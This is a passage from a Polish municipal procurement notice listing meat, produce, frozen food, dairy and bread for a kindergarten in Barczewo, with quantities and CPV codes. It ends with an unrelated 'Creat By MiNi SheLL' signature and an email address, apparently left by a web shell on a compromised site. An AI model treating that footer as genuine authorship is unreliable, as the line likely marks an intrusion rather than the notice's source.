Makrela w sosie pomidorowym bez warzyw op co najmnie 200g
Szt
100
68.
  Sałatka z makreli op co najmniej 150g
Szt
120
69.
Cukier puder op.co najmniej 500g
Kg
10
70.
Tymianek suszony waga co najmniej10g
Szt
30
71.
Oregano suszone waga co najmniej 10g
Szt
40
72
Napój owocowy ze słomką w kartonikach op co najmniej 150g
szt
880
73
Kawa zbożowa sypana op.co najmniej 200g
szt
50
74
Ryż brązowy 
kg
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-7
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Karkówka surowa wieprzowa bez kości
Kg
170
2.
Łopatka wieprzowa surowa bez kości
Kg
375
3.
Wołowina surowa ligawa
Kg
35
4.
Szynka wieprzowa surowa bez kości,bez skóry
Kg
150
5.
Filet z indyka surowy
Kg
170
6.
Filet z kurczaka surowy
Kg
300
7.
Schab bez kości surowy wieprzowy
Kg
140
8.
Udka bez grzbietu z kurczaka surowe
Kg
250
9.
Antrykot wołowy surowy
Kg
30
10.
Żebra wołowe surowe
Kg
20
11.
Porcje rosołowe z kurczaka
Kg
50
12.
Wątróbka drobiowa surowa
Kg
30
13.
Parówki wp. cienkie o zwartości co najmniej60% mięsa wp.
Kg
70
14.
Ogonówka wp. parzona zawierajaca co najmniej 64% mięsa wp.
Kg
35
15.
Schab wędzony parzony zawierajacy co najmniej 73% mięsa wp.
kg
20
16.
Polędwica wp wędzona parzona zawierajaca co najmniej 63% miesa wp.
Kg
25
17.
Szynka wędzona parzona  mieso wp. 100%
kg
60
18.
Kiełbasa wp-baton zawierajaca 100% mięsa wp.sucha
Kg
25
19.
Szynka wędzona parzona -mięso wp.77%
Kg
50
20.
Kiełbasa szynkowa zawierająca co najmniej 70% mięsa wp
Kg
50
21.
Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.
kg
40
22.
Filet wędzony z indyka o zawartości mięsa co najmiej 90%
Kg
45
23.
Kiełbasa drobiowa -baton o zawartości mięsa co najmniej70%
Kg
55
24.
Łopatka pieczona zawartość mięsa co najmniej 90%
kg
45
25.
Pasztet pieczony drobiowy zawierający co najmniej30% mięsa z kury
kg
35
26.
Filet wędzony drobiowy zawierajacy co najmniej 60% mięsa z kury.
Kg
15
27
Parówki drobiowe zawierająca co najmniej 60% miesa drobiowego
kg
30
28
Schab wp. parzony 
kg
20
29
Pasztet pieczony wp zawierający co najmniej 30% mięsa wp.
kg
35
30
Smalec wp. kostka 200-250g
Kg
20
31
Boczek wędzony parzony
Kg
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.
CPV:  03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Ziemniaki stare
kg
6000
2.
Marchew świeża korzeń
kg
600
3.
Pietruszka świeża korzeń
kg
150
4.
Cebula biała
kg
100
5.
Cebula czerwona
kg
40
6.
Seler świezy korzeń
kg
150
7.
Por świeży
kg
220
8.
Kapusta czerwona świeża
kg
120
9.
Pieczarki świeże 
kg
50
10.
Czosnek kraj pochodzenie polska głowka 
szt
120
11.
Szczypior świeży pęczek
szt
600
12.
Rzodkiewka pęczek
szt
600
13.
Rzodkiew biała świeża
Kg
40
14
Sałata lodowa ,pakowana główka
szt
80
15
Sałata  zielona świeża główka
Szt
450
16
Pomidory czerwone, świeże
kg
400
17
Ogórek swieży,zielony szklarniowy
kg
180
18
Ogórek kwaszony
Kg
80
19
Kapusta kwaszona biała
kg
180
20
Kapusta pekinska 
kg
90
21
Kapusta biała słodka  główka
kg
220
22
Papryka czerwona ,żółta,zielona
kg
50
23
Cytryna świeża
Kg
40
24
Jabłka świeże
kg
1200
25
Banany świeże
kg
300
26
Gruszki świeże
kg
120
27
kiwi
Kg
70
28
Mandarynki  świeże
kg
300
29
Winogrona zielone bezpestkowe
kg
80
30
arbuzy
Kg
40
31
Śliwka fioletowa duża
kg
60
32
Brzoskwinie
kg
60
33
Truskawka świeża
kg
60
34
Winogrona granatowe
kg
40
35
Koper zielony,świeży pęczek 100g
Szt
600
36
Natka pietruszki świeza pęczek  100g
szt
600
37
Burak czerwony świeży
Kg
350
38
Rodzynki op.co najmniej 100g-150g
kg
3
39
Orzechy włoskie łuskane op.co najmniej100g
kg
2
40
Fasola sucha średnia  op.400-1000g
Kg
30
41
Groch połówki op. 400-1000g
kg
30
42
Pietruszka suszona natka op.50-100g
kg
2
43
Włoszczyzna suszona op.100-200g
kg
3
44
Koper zielony suszony op 50-100g
kg
1
45
Pestki słonecznika op.50-150g
kg
1
46
Żurawina suszona op.250-500g
kg
3
47
Cebulka suszona op.50-100g
kg
1
48
Kapusta młoda biała główka ( w sezonie)
kg
30
49
Ziemniaki młode (w sezonie)
kg
200
50
Botwinka pęczek(w sezonie)
pęczek
60
51
Ogórek świeży gruntowy (w sezonie)
kg
25
52
Włoszczyzna w pęczkach młoda (w sezonie)
pęczek
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone) PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4)                                    
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)
kg
1000
2.
Mieszanka 7-składnikowa z kapusta 2000-2500g
kg
180
3.
Brokuły mrożone 450g-2500g
kg
150
4.
Kalafior mrożony op.450-2500g
kg
150
5
Fasolka szparagowa żółta cięta op.450-2500g
kg
100
6
Fasolka szparagowa zielona cieta op.450-2500g
kg
100
7
Szpinak mrożony mielony.op.450-2500g
Kg
90
8 
Groszek zielony mrożony op.450-2500g
kg
60
9
Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g
kg
60
10
Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 
Kg
300
11
Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna
kg
250
12
Truskawka mrożona op.450-2500g
Kg
150
13
Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g
Kg
150
14
Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g
kg
150
15
Marchew kostka op.450-2500g
kg
190
16
Marchew z groszkiem op.450-2500g
Kg
150
17
Wiśnia b)p op.450-2500g
Kg
60
18
Porzeczka czarna mrożona op.450-2500g
kg
60
19
Dorsz filet SHP
kg
90
20
Miruna filet SHP
kg
100
21
Morszczuk filet SHP
kg
60
22
Mintaj filet SHP
kg
80
23
Makrela wędzona
Kg
48
24
Włoszczyzna 3-składnikowa paski op.450-2500g
Kg
100
25
Pyzy z mięsem op.500-1000g mrożone
kg
60
26
Pierogi z truskawkami op.500-1000g mrożone
kg
100
27 
Ryba sola filet mrożona
kg
30
28
Pierogi z jagodami mrożone op500-1000g
kg
50
29
Mieszanka kompotowa z owoców leśnych op2000-2500g
kg
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3

Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Mleko folia 2%op.1000ml
L
6350
2.
Serek topiony o smaku śmietankowym kostka 100g
szt
350
3.
Mleko UHT op.1000ml 2%
L
150
4.
Mleko UHT op.1000ml 3,2%
L
150
5.
Masło ekstra zawierajace co najmniej 82% tłuszczu
kg
270
6.
Jogurt wielosmakowy,waga op.co najmniej150g
szt
2600
7.
Serek homogenizowany wanilia op.co najmniej 135g
szt
2000
8.
 Deser waniliowy pakowany op. co najmniej120g
szt
250
9.
Jogurt z kawałkami owoców,waga op.co najmnie150g
szt
2500
10.
Jogurt owocowy  do picia różne smaki typu Actimel lub równoważny op.co najmniej 100ml
szt
1000
11
Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)
kg
35
12
Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)
kg
45
13
Śmietana 12% op.200-400g
L
350
14
Śmietana 18% op.200-400g
L
250
15
Twaróg krajanka półtłusty
kg
460
16
Jogurt naturalny op. co najmniej 400ml
L
150
17
Serek topiony kostka 100g z szynką
Szt 
90
18
Jogurt owocowy do picia typu Milko lub równoważny op.co najmniej 0,5l
L
240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Chleb pszenno-żytni krojony foliowany waga co najmniej500g
Szt.
1800
2
Chleb razowy krojony foliowany waga co najmniej  400g
szt
1200
3
Bułki kajzerki waga co najmniej 50g
szt
2000
4
Bułka grahamka waga co najmniej 50-90g
szt
1800
5
Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g
szt
300
6
Ciasto drożdżowe
kg
140
7
Chałka zdobna co najmniej 250g
szt
400
8
Babka piaskowa
Kg
120
9
Rogaliki krucho -drozdżowe nadziewane
kg
160
10
Rogale maślane waga co najmniej 50g
szt
1000
11
Bułki czerstwe  waga co najmniej waga 50g
szt
500
12
Bułka tarta
kg
80
13
Bułka maślana waga co najmniej50g
szt
800
14
Piernik przekładany
Kg
40
15
Pączki lukrowane
szt
250
16
Rolada biszkoptowa z galaretką
kg
30
17
Bułka bagietka 
szt
80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com